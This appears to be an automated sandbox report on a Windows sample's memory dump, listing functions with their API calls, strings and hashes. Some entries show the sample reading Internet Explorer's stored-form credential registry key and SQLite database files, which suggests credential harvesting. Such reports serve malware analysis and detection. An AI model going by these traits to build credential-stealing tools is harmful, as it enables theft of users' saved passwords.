Opcode ID: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
Instruction ID: ebdbfbf94f53a3690cf38ac0907b9363cbed6c4ceb444703d02dc3853126dfb0
Opcode Fuzzy Hash: 630083eee7cbf1c10867c7b3dfcb71eb0ae95e41edb8436bedb91c8cd5998a80
Instruction Fuzzy Hash: 3851AE726007049FD724DF29C586B5AB7E4FF48314F10862EE95ADB391DB78E5408B48

Uniqueness

Uniqueness Score: -1.00%

Function 004171A2, Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004171FA
Sleep.KERNEL32(00000001), ref: 00417204
GetLastError.KERNEL32 ref: 00417216
UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004172EE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
Instruction ID: b1728a7637de8f6c0c3372c087848d546b31592ea547c84e90bff2a5ea0aeb9c
Opcode Fuzzy Hash: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
Instruction Fuzzy Hash: 2F41F27550C702AFE7218F20DC01BA7B7F1AB90B14F20496EF59552381DBB9D9C68B1E

Uniqueness

Uniqueness Score: -1.00%

Function 004147A8, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004147DF
memcpy.MSVCRT ref: 0041480B
memcpy.MSVCRT ref: 00414825

Strings

<br>, xrefs: 0041481F
<, xrefs: 004147BC
&, xrefs: 00414805
>, xrefs: 004147CA
", xrefs: 004147D9
°, xrefs: 004147F6

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
Instruction ID: 1058aa724a71ea66541b56df80d5a3cdc90ec5801de880f61679d0e38116f1b7
Opcode Fuzzy Hash: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
Instruction Fuzzy Hash: 2901927AE542A1A5F63031094C86FF74198DBE3B15FB14127FA96252C5E28D49C382AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040A56F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA

Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62

Part of subcall function 00408EE8: free.MSVCRT(?,00000000,?,0040923F,00000000,?,00000000), ref: 00408EF7

memset.MSVCRT ref: 0040A5DF
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 0040A60D
_wcsupr.MSVCRT ref: 0040A627

Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44

memset.MSVCRT ref: 0040A676
RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 0040A6A1
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040A6AE

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A58C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 4131475296-680441574
Opcode ID: 44a17b0fae2e66326d3e2503c173478f0aec1c0523b0dfda06b815c5dcd27038
Instruction ID: 4ff845341dcd1a768bfc42e85b7312ef223b671260cd3b9f040e87321517091f
Opcode Fuzzy Hash: 44a17b0fae2e66326d3e2503c173478f0aec1c0523b0dfda06b815c5dcd27038
Instruction Fuzzy Hash: AB413BB694021DABDB00EF99DC85EEFB7BCAF58304F10417AB504F2191DB789B458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B301, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
wcscpy.MSVCRT ref: 0040B382

Part of subcall function 0040B7F3: memset.MSVCRT ref: 0040B806
Part of subcall function 0040B7F3: _itow.MSVCRT ref: 0040B814

wcslen.MSVCRT ref: 0040B3A0
GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
memcpy.MSVCRT ref: 0040B419

Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B299
Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2F3

Strings

strings, xrefs: 0040B378

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
Instruction ID: c57a50961ac065af18f7b97b0dfcf96f0970c66ac6ac5239858a4cd79fa145fe
Opcode Fuzzy Hash: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
Instruction Fuzzy Hash: 35415975200701BBDB259F14FC9593A3365E784387B20453EE802A73A3DB39EA16DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0F4, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041B22C
memcpy.MSVCRT ref: 0041B23E
memcpy.MSVCRT ref: 0041B256
memcpy.MSVCRT ref: 0041B273
memcpy.MSVCRT ref: 0041B28B
memset.MSVCRT ref: 0041B358

Strings

-wal, xrefs: 0041B285
-journal, xrefs: 0041B250

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID: -journal$-wal
API String ID: 438689982-2894717839
Opcode ID: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
Instruction ID: 74a332e22f0b607a266e47b82b9d8ba1ef45136a3b8be849caa08d0d2b66e2c9
Opcode Fuzzy Hash: 03130a360da8abbc95f923260a1065ecabb8559cb051c40a0d33823f6f36a5bc
Instruction Fuzzy Hash: DCA1C071A0464AEFDB14DF64C8417DEBBB0FF04314F14826EE46997381D738AAA4CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004050AF, Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00405153
GetDlgItem.USER32 ref: 00405166
GetDlgItem.USER32 ref: 0040517B
GetDlgItem.USER32 ref: 00405193
EndDialog.USER32(?,00000002), ref: 004051AF
EndDialog.USER32(?,00000001), ref: 004051C4

Part of subcall function 00404E6E: GetDlgItem.USER32 ref: 00404E7B
Part of subcall function 00404E6E: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E90

SendDlgItemMessageW.USER32 ref: 004051DC
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004052ED

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
Instruction ID: 2cde12ba5927d4bde9809f16a4ff1e8400ea1fd37873b15a8c1cc8d9e94e8744
Opcode Fuzzy Hash: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
Instruction Fuzzy Hash: 6961B030600B05ABDB31AF25CC86B6B73A5FF50324F00863EF515AA6D1D778A951CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004052FD, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040530D
??3@YAXPAX@Z.MSVCRT ref: 00405329
??2@YAPAXI@Z.MSVCRT ref: 0040534F
memset.MSVCRT ref: 0040535F
??2@YAPAXI@Z.MSVCRT ref: 0040538E
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 004053DB
SetFocus.USER32(?,?,?,?), ref: 004053E4
??3@YAXPAX@Z.MSVCRT ref: 004053F4

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
Instruction ID: 5d7335f69ca4f594208563f7014043d8df0e1bea6ea55c180c5050c90dc7a29e
Opcode Fuzzy Hash: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
Instruction Fuzzy Hash: E931A4B1500A01AFEB14AF69C98691AB7A4FF04354710453FF545E7691DB78EC90CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040547A, Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00405491
GetWindow.USER32(?,00000005), ref: 004054A9
GetWindow.USER32(00000000), ref: 004054AC

Part of subcall function 00401735: GetWindowRect.USER32 ref: 00401744

GetWindow.USER32(00000000,00000002), ref: 004054B8
GetDlgItem.USER32 ref: 004054CE
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040550D
GetDlgItem.USER32 ref: 00405517
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405566

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$ItemMessageRectSend$Client
String ID:
API String ID: 2047574939-0
Opcode ID: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
Instruction ID: ee080d675ccdbf70b04d6128f25a7e8090f7ef981af0433368dbc7d1a9e2eb74
Opcode Fuzzy Hash: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
Instruction Fuzzy Hash: AB218071690B0977EA0137229D86F6B366DEF96714F10003AFA007B2C2EEBA580245AD

Uniqueness

Uniqueness Score: -1.00%

Function 00418137, Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00418151
memcpy.MSVCRT ref: 00418160
GetCurrentProcessId.KERNEL32 ref: 00418171
memcpy.MSVCRT ref: 00418184
GetTickCount.KERNEL32 ref: 00418198
memcpy.MSVCRT ref: 004181AB
QueryPerformanceCounter.KERNEL32(?), ref: 004181C1
memcpy.MSVCRT ref: 004181D1

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
String ID:
API String ID: 4218492932-0
Opcode ID: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
Instruction ID: d236c1b17a1aae76216467299f6e18822a0d202c31a727bef5ceca0d2f67f94c
Opcode Fuzzy Hash: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
Instruction Fuzzy Hash: B31184B3D005186BDB00EFA4DC49EDAB7ACEB5A210F454937FA15DB141E638E6448798

Uniqueness

Uniqueness Score: -1.00%

Function 0040D26F, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

wcscat.MSVCRT ref: 0040D33E
_snwprintf.MSVCRT ref: 0040D365

Strings

<td bgcolor=#%s nowrap>%s, xrefs: 0040D27F
<td bgcolor=#%s>%s, xrefs: 0040D28D
<tr>, xrefs: 0040D297
 , xrefs: 0040D338

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
Instruction ID: 8f1261d6e50b9fc48a8d4c2a01cb2efc3c1dd918db621c17a7092c97f5fd87e6
Opcode Fuzzy Hash: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
Instruction Fuzzy Hash: 7E318D31900209EFDF04EF54CC86AAE7F75FF44320F1001AAE905AB2E2C738AA55DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B974, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040B98A
memset.MSVCRT ref: 0040B9A9
GetMenuItemInfoW.USER32 ref: 0040B9E5
wcschr.MSVCRT ref: 0040B9FD

Strings

0, xrefs: 0040B9C4
6, xrefs: 0040B9CC

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
Instruction ID: 3c4375d2aaca836e1f5ba8730f1b4cbf28b1f601c5efe325adce4426e162c3cb
Opcode Fuzzy Hash: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
Instruction Fuzzy Hash: 6A218B72605340ABD710DF55D845A9BB7E8FB89B54F00063FF644A2291E77ADA00CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 004086FA, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00408716
GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 00408742
GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 00408757
wcscpy.MSVCRT ref: 00408767
wcscat.MSVCRT ref: 00408774
wcscat.MSVCRT ref: 00408783
wcscpy.MSVCRT ref: 00408795

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
Instruction ID: e89223cf66055297cb9dadcb336121efaa359588445afa49c1b13fad1ad85cab
Opcode Fuzzy Hash: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
Instruction Fuzzy Hash: 3D1160B280011CBBEF11AF94DD45EEB7BBCEB41744F10407BBA04A6091D6389E448B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D86C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D891
memset.MSVCRT ref: 0040D8A6
_snwprintf.MSVCRT ref: 0040D8F3

Strings

<%s>, xrefs: 0040D8E2
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040D8BF
<?xml version="1.0" ?>, xrefs: 0040D8B8

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
Instruction ID: 334aba75e86a29cb8f13e765f22732fbee0fc66aecb0188c901082e5a368eb6e
Opcode Fuzzy Hash: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
Instruction Fuzzy Hash: 6C01DFB2A402197BE710A759CC41FAA776DEF44744F1440B7B60CF3141D7389E458799

Uniqueness

Uniqueness Score: -1.00%

Function 00408806, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408826
_snwprintf.MSVCRT ref: 0040884D
wcscat.MSVCRT ref: 0040885F
wcscat.MSVCRT ref: 0040887C
wcscat.MSVCRT ref: 0040888B

Strings

%2.2X, xrefs: 0040883C

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
Instruction ID: 7e3155c1ee39ddc5e1c88fc61abef366a99ea1f709d40badb718d03975286e65
Opcode Fuzzy Hash: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
Instruction Fuzzy Hash: 8F012873D4031866F734E7519C46BBA33A8AB81B18F11403FFC54B51C2EA7CDA4446D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7A3, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040B7C8
wcscpy.MSVCRT ref: 0040B7EB

Strings

strings, xrefs: 0040B7D6
menu_%d, xrefs: 0040B7AC
general, xrefs: 0040B7E1
dialog_%d, xrefs: 0040B7BC

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
Instruction ID: fa5e8ebf88800a0e12fd117f624f479e56397311d80730f797776366f89ad5f2
Opcode Fuzzy Hash: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
Instruction Fuzzy Hash: 9FE086717C830031FE1115511E83F162150C6E5F95FB1046BF505B16D2DB7D8864668F

Uniqueness

Uniqueness Score: -1.00%

Function 0042A67D, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042A6FC

Strings

a GROUP BY clause is required before HAVING, xrefs: 0042A92B
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042A93F
8, xrefs: 0042A814
ORDER, xrefs: 0042A887
GROUP, xrefs: 0042A8B9

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-1606337402
Opcode ID: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
Instruction ID: c7fea52ce07df1abaedfaf21b9d509cbcb108d5d19e9a81960d934b60e9c5d67
Opcode Fuzzy Hash: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
Instruction Fuzzy Hash: 6A818D70A083219FDB10DF15E48161BB7E0AF94324F59885FEC859B252D378EC95CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00413117, Relevance: 9.1, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004115CD,00000000,00000000), ref: 00413152
memset.MSVCRT ref: 004131B4
memset.MSVCRT ref: 004131C4

Part of subcall function 00413031: wcscpy.MSVCRT ref: 0041305A

memset.MSVCRT ref: 004132AF
wcscpy.MSVCRT ref: 004132D0
CloseHandle.KERNEL32(?,004115CD,?,?,?,004115CD,00000000,00000000), ref: 00413326

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
Instruction ID: cefdbdf849389f09311ea621c5a87f262da3bfb792e558c61850347b92c9bf04
Opcode Fuzzy Hash: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
Instruction Fuzzy Hash: 0D514971108344AFD720DF65CC88A9BB7E8FB84306F404A2EF99982251DB74DA44CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5DA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D611

Part of subcall function 004147A8: memcpy.MSVCRT ref: 00414825

Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A

_snwprintf.MSVCRT ref: 0040D65B

Strings

<%s>%s</%s>, xrefs: 0040D64E
</item>, xrefs: 0040D677
<item>, xrefs: 0040D5E4

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
Instruction ID: be7e472b8ae12577d0ef69e4d5a2bd87498dbd4f23eec6cc8c98af6d964d1ad5
Opcode Fuzzy Hash: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
Instruction Fuzzy Hash: 3E11C13160031ABBEB11AB65CCC6E997B25FF08708F100026F809676A2C739F961DBC9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2F9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F329

Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D

wcsrchr.MSVCRT ref: 0040F343
wcscat.MSVCRT ref: 0040F35F

Strings

.cfg, xrefs: 0040F359
General, xrefs: 0040F369

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg$General
API String ID: 776488737-1188829934
Opcode ID: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
Instruction ID: 56bea33938f28168157b0b8bcc93b38caa6b0521648f49714e8bc2d05d89a73e
Opcode Fuzzy Hash: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
Instruction Fuzzy Hash: 831186769013289ADF20EF55CC85ACE7378FF48754F1041FBE508A7142DB789A858B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041409A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 004140A9
wcscpy.MSVCRT ref: 004140C4
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040F398,00000000,?,0040F398,?,General,?), ref: 004140EB
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 004140F2

Strings

General, xrefs: 004140BE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$CloseCreateFileHandle
String ID: General
API String ID: 999786162-26480598
Opcode ID: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
Instruction ID: 886da17c1b1bf2e9de85dc8b7e1e57be2bc6bdc909f117fec59c49a827307fb5
Opcode Fuzzy Hash: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
Instruction Fuzzy Hash: 6BF059B3408701AFF7209B919C85E9B7BDCEB98318F11842FF21991011DB384C4486A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041473D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00404C4C,00000000), ref: 00414746
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C

Strings

shlwapi.dll, xrefs: 0041473F
SHAutoComplete, xrefs: 0041474E

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
Instruction ID: 374e307410260eae357c848a0ac8b8d2ed108e4990ae0ebeecf0dac054c84ad8
Opcode Fuzzy Hash: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
Instruction Fuzzy Hash: B1D05B397005206BEA5167366C48FEF3A55EFC7B517154031F910D2261DB648C0285AD

Uniqueness

Uniqueness Score: -1.00%

Function 004351F7, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

Strings

new, xrefs: 00435285
foreign key constraint failed, xrefs: 00435497
oid, xrefs: 004352C1
old, xrefs: 0043527B

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
Instruction ID: aa3871157cb2c29edb2d7db9a5a62b5d9e1ddd85e1ada7e098d24c65e5f6a169
Opcode Fuzzy Hash: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
Instruction Fuzzy Hash: 60E1BF71E00209EFDB14DFA5D981AAEBBB5FF48304F10806AE805AB341DB78AD51CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040C181, Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166

??3@YAXPAX@Z.MSVCRT ref: 0040C19C
??3@YAXPAX@Z.MSVCRT ref: 0040C1AF
??3@YAXPAX@Z.MSVCRT ref: 0040C1C2
??3@YAXPAX@Z.MSVCRT ref: 0040C1D5
free.MSVCRT(00000000), ref: 0040C20E

Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
Instruction ID: 1b724bf31a54a7cffb96c88967fdb5b0379f9a1dee2f65518d31c165403446cb
Opcode Fuzzy Hash: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
Instruction Fuzzy Hash: 6E01E532905A31D7D6257B7AA68151FB396BEC2710316026FF845BB2C38F3C6C414ADD

Uniqueness

Uniqueness Score: -1.00%

Function 0040B60E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

